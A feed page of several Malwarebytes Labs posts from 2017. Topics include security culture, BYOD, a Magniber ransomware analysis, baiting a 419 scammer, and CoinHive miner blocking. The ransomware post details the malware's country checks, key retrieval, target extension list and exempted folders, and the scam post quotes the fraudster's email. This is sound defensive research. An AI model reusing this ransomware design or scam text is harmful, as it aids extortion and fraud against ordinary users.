Techie Feeds

How to create an intentional culture of security

Malwarebytes - Thu, 10/19/2017 - 18:00

In this day and age, companies great and small are vulnerable to potential attacks that they are exposed to every day. From insider threats to simple phishing, one is always left guessing if they know enough to handle them or are well prepared to face the risks. Educating your staff about basic computing hygiene is one thing, but ingraining in them security practices that they do almost naturally, even beyond the confines of the office, is another. The latter involves being part of a culture where people think, act, and behave the same way. And we’re not just talking about an organic culture, but one that was created with intentionality at the core.

Before going further, let’s first find out why it’s important that we create and cultivate an intentional culture of security. We’ll also name a few misconceptions surrounding security culture and attempt to clear up each one.

Why a culture of security is needed

A culture of security in the workplace had always existed, pre-computing era, although it’s mainly been about physical security. A large area of the office is off-limits to the public, and only those with an access card or proper company identification can go in and out. Not everyone has the key to the HR filing cabinets. And when computers were introduced in the business world, confidential files shared among managers and executives were (and still are) for their eyes only.

Things have changed dramatically since then. Businesses maintain the physical defenses of their assets, but are hard-pressed to stave off threats from the digital realm. There is now a need for organizations to secure their online assets, but criminals have become adept at circumventing basic protections. Regardless of this, the negative perception people have about security—it’s reactionary, it hinders one from conveniently doing their job—persists today. This negativity is a dominant hindrance in further establishing and sustaining a culture of security.

It’s important to have a strong security culture because security is a strategic necessity, whether it’s protecting the data of customers or building relationships and offering services to other business clients. As such, trust is essential. Without sufficient security present in an organization, those doing business with companies would be doubtful and uncertain that their assets are treated with importance and utmost confidentiality as they should. (Note how Equifax stock dropped dramatically after their massive breach was discovered.)

On the other hand, a company with sufficient security has the advantage over competitors that do not have one. When data and assets are protected, trust increases.

Finally, having a security culture in place makes compliance with laws and regulations easier. As regulators start imposing security practices that, frankly, should have been present in companies to begin with, organizations with a security mindset are more receptive to adopting these practices and imbibing them into the current culture.

Read: Make way for the GDPR: Is your business ready?

Misconceptions about a security culture

A culture of security could mean different things to different people. And just like any concept we strive to understand, there are misconceptions about them along the way. If left alone, these misunderstandings could persist, be passed on, or (worse) be treated as facts in the long run. We’ve identified and debunked some of them below.

  • The culture aims to maximize security. A majority of us assume that to improve on security, a company must make use of all security tools at their disposal. Again, this might work with organizations that handle information that is deemed sensitive and valuable, but it doesn’t apply to all companies. A culture aims to optimize security. This means making the most efficient use of resources that are available to them.
  • Having a culture of security in place will stop breaches dead. Unfortunately, this is not a guarantee. People, even well-meaning ones, make mistakes. And often, those errors can cost companies big. A culture of security does not create perfect security; however, it paves the way towards achieving best-possible security. This cannot be accomplished without people in the workplace supporting the concept.
  • A culture of security is IT’s responsibility. On the contrary, every member of the organization is responsible for its security, including the assets it uses, processes, and shares. Everyone plays a part, and no one is exempted. IT can put in place all the technological checks and balances to ward off attacks, but if a user mindlessly clicks on a phishing email, it’s game over. Although some may still choose to ignore culture and policy, this point doesn’t make it more valid.
  • A culture of security must start from the top. It’s a brilliant idea for senior management to not just talk the talk but also walk the walk, but culture doesn’t necessarily have to start with the higher-ups. What it needs are people committed enough to continue to nurture good security practices that are aligned with the organization’s objectives and well integrated with other cultures. This is why these committed people are dubbed champions.
Practical steps to foster a culture of cybersecurity

1. Recognize that security is seen in a negative light; thus, there is a need to help others realize that it’s actually a positive enabler of the company’s initiatives. This is especially true for companies in industries that handle a lot of sensitive personally identifiable information (e.g., banks, hospitals, and intelligence agencies). It’s true that when one thinks of security (or the lack thereof), we often think of preventing fraud, breaches, and hacking. However, trust, consistency, reliability, productivity, and predictability are also terms that we can associate with security. Champions should frame it as such.

2. Assess the current state of the organization’s security culture. Like we said earlier, a culture of security has always existed. But whether the culture is good or bad is another question entirely. Security champions within the company must discover the gaps, and then figure out how to bridge them.

3. Create a positive brand for the security culture. Champions can enlist the help of marketing in this. Think of one thing employees might gravitate to (Cat videos? Outdoor activities? Battlestar Galactica?), and use it convey a unified message to the organization. Then, to further develop the brand, tailor the message according to the benefits of security for each department. Branding can be broadcast via internal memos and newsletters, screensavers, and even posters that employees can see wherever they go.

4. Hold awareness campaigns to educate would-be champions. Here’s the twist: Don’t start on the wrong foot by, say, introducing statistics about hacking and phishing. Instead, the champion should educate their peers on what security is, what their specific roles in it are, and how accountable they are to the company’s resources (e.g., information) that they handle. If one doesn’t know how to fulfill his/her responsibility, further education may be needed.

5. Reward those who support a culture of security. This should also include decision-makers who make it a point to consider the security of information and other valuable enterprise assets before giving a plan the go signal. Although some seek monetary incentive, many do not. At the very least, the champion (and the company) must recognize and attribute a good outcome based on security mindfulness when they see one.

Oh, and one more thing

We believe and often parrot the adage “People are the weakest link.” That the security problem exists between the chair and the monitor. Sadly, this negative notion has affected how we continue to perceive and respond to our peers at work who clicked that link, to clients who are asking for support on a simple matter, even to our younger and older family members who aren’t as technologically savvy as we are. One purpose of fostering a culture of security is not to address them as the weakest link, but instead make people realize that they are our only link in security. A collective understanding that security is supposed to work for people and for the organization, not the other way around, is something that we should all aim and strive to achieve.

Other related post(s):

The post How to create an intentional culture of security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BYOD, why don’t you?

Malwarebytes - Thu, 10/19/2017 - 17:16

Bring Your Own Device (BYOD) is a policy that allows employees to bring their own devices to the workplace and use them there. At one time, this was the latest bonus to attract and keep employees happy—plus save a few bucks. Nowadays the question is more like: Is there anyone who doesn’t bring his own device (at least a smartphone) to the workplace?

But BYOD is more than just bringing your device along. The expression also implies that you can use your own device to access and use corporate resources. But what are the security issues that this policy opens up for both parties?

The risks for the company
  • People outside the company get access. Access by someone outside of the company can happen due to devices being stolen or by people leaving the company.
  • Devices leave the company environment. Outside the company environment, the devices are still carrying important information and may be used to access insecure networks elsewhere.
  • Devices might not be protected or patched. BYOD devices might not be protected as well as the devices that are under control by the companies IT department. This works both ways, since many companies have a slow patching process to keep legacy applications running and to allow for testing before patches and updates are rolled out. Either way, a discrepancy in updates and patches can result in problems for both sides.
The risks for the employee owner
  • This limits the use of the device outside the company. The employee has to be more vigilant than they might be if he didn’t use the device for company matters. For example, browsing in a coffee shop on an open network might be prohibited, or at least dangerous, on that device.
  • Who is to blame in case of leaks? Pointing the finger for who is to blame, or fearing the repercussions, can ruin a healthy work relationship. Employees might be more liable if they used a BYOD device instead of a work-issued one.
  • There might be discrepancy in patching and updates. The employee may have to wait before he patches or updates his Operating System or applications that are used in the workplace. This leaves his work and personal data vulnerable.
Mitigating the risks

To limit the downside and keep possible damage to a minimum, it helps to:

  • Have a clear policy and rules to enforce it. A well thought out policy about BYOD allows you to set rules that everyone understands—not only understand what the rules prescribe, but also why they are needed.
  • Have an active mobile device management solution. Even if there are no mobile devices owned by the company itself, there needs to be mobile device management to keep the company-controlled data and applications separated from the private ones.
  • Use strong authentication and encryption methods. A suitable method of strong authentication enables you to shut out the owners of stolen devices and terminated accounts. Encryption can also keep your communications and data safe from prying eyes.

Allowing your staff to BYOD has mutual benefits, but we recommend taking some precautions if you don’t want the downside to outweigh the good. Being aware of the potential dangers is important, but only a small part of what needs to be done. Securing personal devices at the workplace and securing workplace devices at home is equally important, as well as creating and implementing a strong cybersecurity policy that covers this type of flexibility. Take these steps and you can better enjoy a less cumbersome, more fluid work environment.

The post BYOD, why don’t you? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Magniber ransomware: exclusively for South Koreans

Malwarebytes - Thu, 10/19/2017 - 00:29

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples Older sample Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems with Korean language detected. The executable is pretty noisy, because it implements various tasks just by command line. Running it on the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can see also the ransom note and yet another file. Its name is the same as the part of the domain that has been generated for the particular user, and its extension is the same as the extension of the encrypted files:

To each encrypted file is added an extension that is composed of small Latin characters and is constant for the particular sample of Magniber.

The same plain-text makes the same cipher-text. This means each and every file is encrypted using exactly the same key.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version; it suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting domains that are generated by the built-in algorithm. The same domains that are used as CnC are later used for individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). In case of any other detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself
What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov avi asf mpeg vob mpg wmv fla swf wav mp3

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:\documents and settings\all users\ :\documents and settings\default user\ :\documents and settings\localservice\ :\documents and settings\networkservice\ \appdata\local\ \appdata\locallow\ \appdata\roaming\ \local settings\ \public\music\sample music\ \public\pictures\sample pictures\ \public\videos\sample videos\ \tor browser\ \$recycle.bin \$windows.~bt \$windows.~ws \boot \intel \msocache \perflogs \program files (x86) \program files \programdata \recovery \recycled \recycler \system volume information \windows.old \windows10upgrade \windows \winnt How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

 The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending if the sample is running under the debugger or not (detected using time check).

Four domains are being queried for the key:

If any of them give a 16-byte long response, that means the valid key is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with the AES key hardcoded. However, it is used only as a backup if downloading the key from the CnC was for some reason impossible (that occurs also in the case if the public IP was not from Korea). The key is unique per each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

If any of them gives 16  byte long response, that means the valid key, it is copied to the buffer and used further. Otherwise, it falls back to the hardcoded key.


Similarly, the initialization vector is always hardcoded in the sample (but not downloaded). The same 16-character long string was also saved at the file beginning. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

First, the crypto context is initialized. The malware imports the key and initialization vector with the help of functions CryptImportKey, CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte long string at the beginning of the file. Then, the file is read chunk by chunk and encrypted using Windows Crypto API.


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, approaching the same targets. However, internally it has nothing in common with the Cerber and is much simpler. The only feature that makes it unique is being so picky about the targeted country. For the first time, we are seeing country checks being performed at various levels of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Categories: Techie Feeds

419 scammer offers USD $60 million—and a free child

Malwarebytes - Wed, 10/18/2017 - 18:46

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project. I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account. Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account. Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting has meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do— ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

I thought he might have Googled Hogwarts Express here, but my luck holds out:

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:

To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.

Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:


The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When an “Outstanding” rating from CNET isn’t enough

Malwarebytes - Wed, 10/18/2017 - 17:28

The editors at respected tech site CNET/ recently awarded Malwarebytes for Windows with an “outstanding” rating of 4.5 stars out of five. In the review, editor Tom McNamara recommended Malwarebytes because the scanning engine is of “high quality,” it works well with Windows 10, and does a good job of explaining processes in plain English. Malwarebytes for Windows was one of the very few security programs to earn more than four stars from both the editors and CNET/ users.

So you’d expect that it would be champagne, fist bumps, and free kittens all around for a job well done here at Malwarebytes Galactic HQ.

Nope. All we can think about is that half star that we didn’t get. Perfection is hardcoded into our company DNA. It has to be.

Because, the way we figure it, a cybercriminal has to be is right only once, on one computer, anywhere on this big spinning top of ours, in order to be successful. And cybercriminals are taking a lot of shots—our products detect approximately three million pieces of malware on millions of devices every day. Every day. Which essentially means our job is never done.

This is the brutal math that keeps us up at night: millions of devices to protect, zero successful malware attacks. So we’re constantly tinkering with the Malwarebytes technology to make it smarter. In fact, the next version of Malwarebytes for Windows, version 3.3, is just around the corner. It’s our best protection yet—and we set that bar very high.

Now don’t get us wrong: We’re thankful and humbled by CNET’s recognition. Four and a half stars means we’re doing a really fine job delivering a malware-free existence to our customers, but that remaining half star is on our minds, no doubt.

The post When an “Outstanding” rating from CNET isn’t enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why is Malwarebytes blocking CoinHive?

Malwarebytes - Wed, 10/18/2017 - 15:00

If you’ve encountered a Malwarebytes web protection block for over the last few weeks, you are either glad about it, angry about it, or don’t really care.  Since September 19, the second most frequently blocked website for our customers has been, and when we observe that immense amount of blocking (over 130 million blocks in a few weeks), we try to explain why we are doing what we are doing.

This post will describe what CoinHive is, what it is doing, and why we are blocking it. We’ll even tell you how to exclude this from your instance of Malwarebytes, if you decide to do so.

What is Cryptocurrency mining?

Do you remember when Bitcoin first came out? It was under the radar for a while—mainly hobbyists and folks involved in the development of the cryptocurrency platform paid attention to it. After a few years, Bitcoin (BTC) has become more and more popular, leading to the emergence of an army of Bitcoin miners.  Miner is a term used to primarily describe software or hardware (and those that use it) created and utilized for the sole purpose of crunching numbers for the cryptocurrency and in return being given a small share of the currency.

A lot of people got involved in BTC mining, which resulted in a bit of a mixed bag of technologies being created and distributed, and in some cases forced to install. Sometimes, a person with the intent and means can run dedicated BTC miners and collect their small fractions of currency until they get a decent amount and then exchange the coins for goods, services, or government-backed money (USD/GBP/etc.).

Cryptocurrency miners are usually VERY resource intensive. This is because you are asking your system to do immense calculations it probably wasn’t designed to do, quickly, which is fine if you’ve got the hardware for it. But if you are running a 10-year-old system you bought off the shelf, it could not only decrease the speed and efficiency of your system, but even damage the hardware.

Miner running on system while visiting The Pirate Bay. Notice the 100% CPU Usage

Over the years, we’ve observed miners also included with sketchy software and malware, as a means to make more money for the people behind this kind of garbage software. Over the years, Bitcoin exchange rates have skyrocketed and the amount of money that can be earned by mining BTC is incredibly low (because of how many people are also running these miners). In lieu of this, new cryptocurrencies have popped up.

Here is a list of the most popular cryptocurrencies back in July 2017, according to an article on Mashable:

  • Bitcoin
  • Ethereum
  • Litecoin
  • ZCash/Monero
  • Tezos

These are the most popular, and therefore the most valuable, because there has been heavy investment in their growth. It is no surprise then that more than one of these cryptocurrencies have had miners put in places they didn’t belong.

What is CoinHive?

CoinHive is a service that provides cryptocurrency miners you can deploy on your website using JavaScript. The coin of this particular realm is Monero (mentioned above), and it totes the claim that using JavaScript miners is an alternative to advertising revenue.

It offers API access for website owners to deploy a miner on their site, have it communicate with the CoinHive remote server and, unfortunately, allow the miners to be run on user systems, without user permission.

Why are we blocking it?

We do not claim that CoinHive is malicious, or even necessarily a bad idea. The concept of allowing folks to opt-in for an alternative to advertising, which has been plagued by everything from fake news to malvertising, is a noble one. The execution of it is another story.

The reason we block CoinHive is because there are site owners who do not ask for their users’ permission to start running CPU-gorging applications on their systems. A regular Bitcoin miner could be incredibly simple or a powerhouse, depending on how much computing the user running the miner wants to use. The JavaScript version of a miner allows customization of how much mining to do, per user system, but leaves that up to the site owner, who may want to slow down your computer experience to a crawl.

Another torrent site running a Monero miner in the background, once again 100 percent CPU usage for visiting a website

Either way, for those that know about cryptocurrency miners and especially JavaScript versions of them, this may be a technology you want to see more of. If so, we include instructions on how to add an exception for CoinHive. However, for those that do not know about this kind of technology, its purpose, or what it could do to their system, we are not comfortable allowing greedy website owners to abuse these users and so, we block it.

How to add an exception

At Malwarebytes, we want to arm our users with knowledge about threats and the tools to protect themselves from those threats. However, we are not in the business of censoring or restricting access to a thing people want to use. For cases like CoinHive, it’s kind of a gray area, so in addition to telling you why we block this site and the danger associated with it, we will also tell you exactly how to get around our block.

Step 1: exclusion tab

Inside of Malwarebytes for Windows in the Settings area, is a tab for exclusions. You can navigate there manually or, after trying to reach, you can just click on the Managed Exceptions button at the bottom of the notification.

Step 2: select exclusion type

Your next step would be to select what kind of exclusion you want to make. You’ll be able to allow anything from applications, website, and even exploits! Select the Website Block radio button and press Next.

Step 3: add exclusion

Finally, Malwarebytes will ask you what is the Website URL or IP address for the site you want to exclude. For CoinHive, you’ll need to exclude the website, as well as the IP address associated.

Step 4: rinse and repeat

As I mentioned, you’ll need to add an exclusion for both the CoinHive URL and the IP address associated with its domain name. So please add exclusions for the following:


After you complete adding the exclusions, your exclusion list in the Malwarebytes interface should look like this:

Step 5: testing

Your final step is to actually navigate to and make sure it’s not being blocked. If it is, go back in and check the settings to make sure you entered the URL and the IP address correctly. I tested this myself and it works. If you’ve done everything correctly, you should be able to navigate to the CoinHive website and also use the miners, even with full Malwarebytes protection enabled.

For more information about adding exclusions to your instance of Malwarebytes for Windows, please check out this Knowledge Base article we’ve written that guides you through every type of exclusion.

We hope some of you who are upset about our detection will understand why we decided to block this and similar websites after reading this article. We know there is a lot of controversy over not only this case, but mining technology in general, and moving forward we need to make sure we use it responsibly and securely. All new technologies have growing pains. The key is to make sure to learn lessons from the past, ensure that technology is secure and that the spirit of why it was created in the first place continues on in new evolutions.

We watched as the advertising industry evolved in such a way that made it easy for cybercriminals to use their platforms to attack users. We really don’t want to see miners go down the same path, and we hope it isn’t too late already.

Thanks for reading, safe surfing, and catch you next time!

The post Why is Malwarebytes blocking CoinHive? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exhibition: it-sa Nuremberg

Malwarebytes - Wed, 10/18/2017 - 09:00

Scroll down for the German version of this post.

Since 2009, security professionals, developers, and product providers have shared their ideas and platforms at it-sa, a security exhibition in the Exhibition Centre in Nuremberg, Germany. This year, it-sa featured 629 exhibitors (including Malwarebytes) and 320 presentations in several open forums. It-sa encompasses the entire spectrum of the latest IT security products from all over the world. The estimated number of visitors was at 12,780.

While at the conference, we met a lot of old friends and made some new ones. And we talked to satisfied customers about what we have been up to since last year, and explained what we could do for companies looking for a new solution against the latest security threats.

We heard some interesting talks covering many fields in the cybersecurity realm and witnessed some live hacking performances. Not to mention we had some great discussions about those latest threats and how we protect our customers against them. Our short presentation about Jaff ransomware got a lot of attention and triggered some interesting discussions.

Our stand during one of the presentations

With ransomware being the prevalent and most worrying cyberthreat in Germany, as well as in the rest of the world, our explanation of the chain of infection that Jaff uses and at what stages of this chain Malwarebytes will protect your system was a popular topic.

In German

Seit 2009 wird die it-sa als eigenständige Messe im Messezentrum Nürnberg veranstaltet. Dieses Jahr waren 629 Aussteller (Inkl. Malwarebytes) vertreten und es gab 320 Vorträge in den offenen Foren. Das Angebotsspektrum der it-sa führt den Besucher entlang alle Themen rund um die IT Sicherheit. Die geschätze Besucher-Anzahl liegt bei 12.780.

Wir haben viele alte und neue Freunde getroffen. Wir haben uns mit zufriedenen Kunden unterhalten und besprochen was wir im letzten Jahr alles erreicht haben. Unteranderem haben wir potentiellen Neukunden erklärt, welche Bedeutung wir für sie haben können.

Zum Glück hatten wir auch noch Zeit, um uns ein paar Interessante Vorträge im Security Bereich anzuhören und ein paar Live-Hacking Sitzungen mit zu verfolgen.

Our it-sa team

Nicht zu vergessen, dass wir einige hervorragende Diskussionen über die neusten Bedrohungen hatten und wie Malwarebytes dagegen schützt.

Da Ransomware in Deutschland, so wie in der Rest der Welt die meist vorkommende und gefürchtete Cyber-Bedrohung ist, war unsere Erklärung von den Vorgang bei einer Jaff Infektion und wie Malwarebytes dagegen schützt ein populaires Thema sowie ein gutes Ausgangspunkt für weitere Diskussionen.

Vielen Dank an die Stadt Nürnberg für die Gastfreundschaft.

The post Exhibition: it-sa Nuremberg appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

Malwarebytes - Tue, 10/17/2017 - 16:44

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

